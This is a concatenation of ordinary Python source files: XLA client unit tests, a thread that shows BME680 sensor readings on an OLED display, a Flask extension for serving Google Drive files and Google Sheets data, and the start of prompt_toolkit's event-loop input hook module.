c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed)), 0)
compiled_c = c.Build().Compile()
xla_client.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(compiled_c)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
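    # ScatterDimensionNumbers below: each entry of `scatter_indices` selects a
    # row of `a` (scatter_dims_to_operand_dims=[0], inserted_window_dims=[0]),
    # and the trailing axis of `updates` (update_window_dims=[1]) is combined
    # into that row using the binary add computation.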
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegexp(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
absltest.main()
|
oled_thread.py
|
import threading
from threading import Lock,Thread
import time,os
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from io import BytesIO
from ctypes import *
import time
import platform
from oled import *
#import numba as nb
from bme680 import *
import globalvar
oled_lock = Lock()
OLED_SizeX = 128
OLED_SizeY = 64
oled_img = Image.new("1",(OLED_SizeX, OLED_SizeY),"white")
oled_draw = ImageDraw.Draw(oled_img)
#@nb.jit()
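# convert() packs the 128x64 PIL "1"-mode image into the page-oriented byte
# buffer that OLED_Fill expects: each output byte holds an 8-pixel vertical
# strip (bit index = y % 8, byte index = (y // 8) * 128 + x), and the pixel is
# inverted because the image is drawn black-on-white.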
def convert(pixels, buf):
for y in range(0, 64):
for x in range(0, 128):
pixel = pixels[x + y*128]
if pixel == 0 :
pixel = 1
else:
pixel = 0
pixel = pixel << (y % 8)
index = int(int(y / 8) * OLED_SizeX + x)
buf[index] |= pixel
def oled_thread():
frqs = []
frq_avg = 0
sum_size = 10
if platform.system() == "Windows":
        oled_font = ImageFont.truetype('C:\\WINDOWS\\Fonts\\segoesc.ttf',13)  # 13 is the font size; simsun.ttc is an alternative
elif platform.system() == "Linux":
        oled_font = ImageFont.truetype('NotoSansCJK-Regular.ttc',13)  # use the 'fc-list :lang=zh' command to find Chinese fonts
elif platform.system() == "Darwin":
        oled_font = ImageFont.truetype('/System/Library/AssetsV2/com_apple_MobileAsset_Font6/00e58c0676b9e589e9309dbca4b795bbba3b5420.asset/AssetData/Kaiti.ttc',13)  # brew install fontconfig, then use 'fc-list :lang=zh' to find Chinese fonts
else:
oled_font = ImageFont.truetype('simsun.ttc', 13)
msg = "LUCERO"
w, h = oled_draw.textsize(msg)
oled_draw.text(((OLED_SizeX-w)/2 - 10,0), msg, font=oled_font)
oled_draw.text((OLED_SizeX - 12,7), "Hz")
if platform.system() == "Windows":
oled_font = ImageFont.truetype('simsun.ttc',11)
xstart = 10
elif platform.system() == "Linux":
oled_font = ImageFont.truetype('NotoSansCJK-Regular.ttc',9)
xstart = 25
elif platform.system() == "Darwin":
oled_font = ImageFont.truetype('/System/Library/AssetsV2/com_apple_MobileAsset_Font6/ec2979c8550757993101e27b30b2b89cb45917fc.asset/AssetData/Yuanti.ttc',10)
xstart = 15
else:
xstart = 15
while True:
start = time.perf_counter()
# start1 = time.perf_counter()
oled_tmpbuf = (c_byte * (128*8))()
oled_lock.acquire()
pixels = list(oled_img.getdata())
oled_lock.release()
convert(pixels, oled_tmpbuf)
elapsed1 = (time.perf_counter() - start)
#logger.debug("%d ms", (int)(elapsed1*1000))
OLED_Fill(oled_tmpbuf)
elapsed = (time.perf_counter() - start)
frq = 1 / elapsed
frqs.append(frq)
frq_avg = sum(frqs) / len(frqs)
if len(frqs) > sum_size:
frqs.pop(0)
tmpstr = "{:f}".format(frq_avg)
tmpstr = tmpstr[:4]
#logger.debug("%02.1f Hz", frq_avg)
oled_lock.acquire()
oled_draw.rectangle((OLED_SizeX - 24,0,127,8),fill ='white') #frequency
oled_draw.text((OLED_SizeX - 24,0), tmpstr)
BME680_lock.acquire()
temp = globalvar.get_value('BME680_Temperature')
hum = globalvar.get_value('BME680_Humidity')
press = globalvar.get_value('BME680_Pressure')
aqi = globalvar.get_value('BME680_AQI')
BME680_lock.release()
        if temp is not None and hum is not None and press is not None and aqi is not None:
oled_draw.rectangle((0, 18,127,63),fill ='white') # data region
msg = u"温度: {:.2f} ℃".format(temp)
oled_draw.text((xstart, OLED_SizeY - 47), msg, font=oled_font)
msg = u"湿度: {:.2f} % RH".format(hum)
oled_draw.text((xstart, OLED_SizeY - 35), msg, font=oled_font)
msg = u"气压: {:.3f} kPa".format(press)
oled_draw.text((xstart, OLED_SizeY - 23), msg, font=oled_font)
msg = u"AQI: {:.2f}".format(aqi)
            # AQI categories per China's "Technical Regulation on Ambient Air Quality Index (Trial)" (HJ 633-2012)
if aqi == 0:
msg += ' Burn in'
elif aqi <= 50:
msg += u' 优'
elif aqi <= 100:
msg += u' 良'
elif aqi <= 150:
msg += u' 轻度'
elif aqi <= 200:
msg += u' 中度'
elif aqi <= 300:
msg += u' 重度'
else:
msg += u' 严重'
oled_draw.text((xstart + 4, OLED_SizeY - 11), msg, font=oled_font)
oled_lock.release()
def oled_thread_start():
t1=Thread(target=oled_thread)
    t1.daemon = True
t1.start()
|
flask_gdrive.py
|
from __future__ import print_function
import pickle
import os.path
import threading
import time
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from flask import current_app, _app_ctx_stack, Response, url_for
class GDriveMain:
"""Base class for using Google Drive api"""
#constructor
def __init__(self, app, creds, token, *args):
self.app = app
self.folder_id = ""
if app is not None:
app.config.setdefault('GDRIVE_CREDENTIALS_URI', creds)
app.config.setdefault('GDRIVE_TOKEN_URI', token)
self.init_app(app, *args)
def init_app(self, app, *args):
pass
    # init_app is to be implemented by subclasses.
    # connect() establishes the Google API credentials.
def connect(self):
        SCOPES = [  # Google API scopes requested
'https://www.googleapis.com/auth/drive.readonly',
'https://www.googleapis.com/auth/spreadsheets'
]
creds = None
"""
        GDRIVE_TOKEN_URI points to the token.pickle file, which stores the user's
        access and refresh tokens. It is created automatically when the
        authorization flow completes for the first time.
"""
if os.path.exists(current_app.config['GDRIVE_TOKEN_URI']):
with open(current_app.config['GDRIVE_TOKEN_URI'], 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
current_app.config['GDRIVE_CREDENTIALS_URI'], SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(current_app.config['GDRIVE_TOKEN_URI'], 'wb') as token:
pickle.dump(creds, token)
return creds
class GDriveStatic(GDriveMain):
"""
    GDriveStatic is the content handler.
    It fetches all the dynamic content from Google Drive.
"""
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'gdrive_service'):
ctx.gdrive_service = None
def init_app(self, app, *args):
remote_folder = args[0]
app.config.setdefault('GDRIVE_STATIC_FOLDER', remote_folder)
app.teardown_appcontext(self.teardown)
@property
def gdrive_service(self):
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'gdrive_service'):
creds = self.connect()
service = build('drive', 'v3', credentials=creds)
result = service.files().list(
pageSize=1, fields='nextPageToken, files(id, mimeType)', q="name='{}'".format(current_app.config['GDRIVE_STATIC_FOLDER'])).execute()
items = result.get('files', [])
if not items:
raise IOError("Folder not found in Google Drive")
else:
self.folder_id = items[0]['id']
ctx.gdrive_service = service
print(self.folder_id)
return ctx.gdrive_service
def fileHandler(self, fpath):
name, ext = os.path.splitext(fpath)
doc_mimetypes = {
'.html': 'text/html',
'.txt': 'text/plain',
}
other_mimetypes = {
'.pdf': 'application/pdf',
'.jpeg': 'image/jpeg',
'.jpg': 'image/jpeg',
'.png': 'image/png',
            '.svg': 'image/svg+xml'
}
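        # Extensions in doc_mimetypes correspond to Google-native documents and
        # must be exported to a concrete mimetype via files().export_media();
        # everything else is downloaded unchanged via files().get_media().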
results = self.gdrive_service.files().list(
pageSize=1, fields="nextPageToken, files(id, mimeType)", q=f"name='{fpath}' and '{self.folder_id}' in parents").execute()
items = results.get('files', [])
if not items:
raise IOError('File Not Found')
else:
file_id = items[0]['id']
if ext in doc_mimetypes:
res = self.gdrive_service.files().export_media(fileId=file_id,
mimeType=doc_mimetypes[ext]).execute()
return res, 200
else:
res = self.gdrive_service.files().get_media(fileId=file_id).execute()
try:
return Response(res, mimetype=other_mimetypes[ext])
                except KeyError:
return res, 200
def g_url_for(self, fpath):
return url_for('fileHandler', fpath=fpath)
class GDriveDB(GDriveMain):
"""
    Database handler class.
    Sends data to and fetches data from the configured Google Sheets.
"""
def teardown(self, exception):
ctx = _app_ctx_stack.top
if hasattr(ctx, 'gdrive_db'):
            ctx.gdrive_db = None
def init_app(self, app, *args):
self.remote_sheets = args[0]
self.RANGE = 'A1:Z'
if len(args) > 1:
cache_update = args[1]
else:
cache_update = 0
# app.config.setdefault('GDRIVE_DB_ID', remote_sheet)
self.cache_update_time = cache_update
app.teardown_appcontext(self.teardown)
@property
def gdrive_db(self):
ctx = _app_ctx_stack.top
if ctx is not None:
if not hasattr(ctx, 'gdrive_db'):
creds = self.connect()
service = build('sheets', 'v4', credentials=creds)
sheet = service.spreadsheets()
self.global_values = dict()
for s in self.remote_sheets:
result = sheet.values().get(spreadsheetId=self.remote_sheets[s], range=self.RANGE).execute()
values = result.get('values', [])
if not values:
raise IOError("Sheet not found")
else:
self.global_values[s] = values
ctx.gdrive_db = self.global_values
self.sheet = sheet
# self.update_thread = threading.Thread(target=lambda: self.update_cache())
# self.update_thread.start()
return ctx.gdrive_db
def update(self, sheet_name):
result = self.sheet.values().update(
spreadsheetId=self.remote_sheets[sheet_name], range=self.RANGE,
body={'values': self.global_values[sheet_name]}, valueInputOption="RAW").execute()
# def update_cache(self):
# time.sleep(self.cache_update_time)
# print("Updating cache")
# #TODO
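# Hedged usage sketch (added for illustration; not part of the original
# module). The credential/token paths, the Drive folder name, the sheet name
# and the spreadsheet id below are placeholders, not values from this project.
def _example_app():
    from flask import Flask
    app = Flask(__name__)
    static_files = GDriveStatic(app, 'credentials.json', 'token.pickle', 'site_content')
    sheets_db = GDriveDB(app, 'credentials.json', 'token.pickle', {'guests': '<spreadsheet-id>'})

    @app.route('/gdrive/<path:fpath>')
    def gdrive_file(fpath):
        # Serves a file from the configured Drive folder through Flask.
        return static_files.fileHandler(fpath)

    return app, sheets_db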
|
inputhook.py
|
"""
Similar to `PyOS_InputHook` of the Python API, we can plug in an input hook in
the asyncio event loop.
The way this works is by using a custom 'selector' that runs the other event
loop until the real selector is ready.
It's the responsibility of this event hook to return when there is input ready.
There are two ways to detect when input is ready:
The inputhook itself is a callable that receives an `InputHookContext`. This
callable should run the other event loop, and return when the main loop has
stuff to do. There are two ways to detect when to return:
- Call the `input_is_ready` method periodically. Quit when this returns `True`.
- Add the `fileno` as a watch to the external eventloop. Quit when file descriptor
becomes readable. (But don't read from it.)
Note that this is not the same as checking for `sys.stdin.fileno()`. The
eventloop of prompt-toolkit allows thread-based executors, for example for
asynchronous autocompletion. When the completion for instance is ready, we
also want prompt-toolkit to gain control again in order to display that.
"""
import asyncio
import os
import select
import selectors
import threading
from asyncio import AbstractEventLoop, get_event_loop
from selectors import BaseSelector
from typing import Callable
from prompt_toolkit.utils import is_windows
__all__ = [
'set_eventloop_with_inputhook',
'InputHookSelector',
'InputHookContext',
]
def set_eventloop_with_inputhook(
inputhook: Callable[['InputHookContext'], None]) -> AbstractEventLoop:
"""
Create a new event loop with the given inputhook, and activate it.
"""
selector = InputHookSelector(selectors.DefaultSelector(), inputhook)
loop = asyncio.SelectorEventLoop(selector) # type: ignore
asyncio.set_event_loop(loop)
return loop
class InputHookSelector(BaseSelector):
"""
Usage:
selector = selectors.SelectSelector()
loop = asyncio.SelectorEventLoop(InputHookSelector(selector, inputhook))
asyncio.set_event_loop(loop)
"""
